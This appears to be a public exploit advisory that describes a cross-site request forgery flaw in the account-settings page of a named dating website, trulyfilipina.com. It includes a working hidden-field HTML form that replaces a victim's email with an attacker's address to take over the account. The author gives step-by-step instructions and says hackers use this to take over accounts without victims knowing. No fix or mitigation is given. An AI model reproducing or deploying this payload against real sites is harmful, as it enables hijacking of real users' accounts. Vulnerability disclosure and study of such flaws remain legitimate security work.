##################################################################### # Title : XSRF Vunlerability in trulyfilipina.com leads to full account takeover # Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16 # Date : /04/06/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) ###################################################################### # Happy Eid for everyone :D ## Poc ## [ + ] Creart account then login into the website [ + ] Go to to this path https://v1.trulyfilipina.com/settings/manageaccount/ Then intercept the request And generate CSRF Poc [ + ] Edit the values then send this form to the victim while he opens the form the server will accept the fake request the we made and victim's data will be changed without his knowing Usually hackers use this vunlerability to get full acces and take over the whole account without the victim's knowing ----------------------------- Vunlerable Form ------------------------------------------------------ <!-- Csrf Poc --> <form action="https://v1.trulyfilipina.com/settings/manageaccount/" class="form-horizontal" role="form" id="MemberManageaccountForm" method="post" accept-charset="utf-8"> <input type="hidden" name="_method" value="POST"/> <input name="data[Member][email]" value="hackedbybassem@gmail.com" maxlength="255" type="hidden" id="MemberEmail" required="required"/> <input name="data[Member][password]" class="form-control" value="" type="hidden" id="MemberPassword"/> <input name="data[Member][repassword]" class="form-control" value="" type="hidden" id="MemberRepassword"/> <input type="submit"/> </form> ------------------------------------------------------------- Sh00tz To my pc :V --------------------------------------------------------------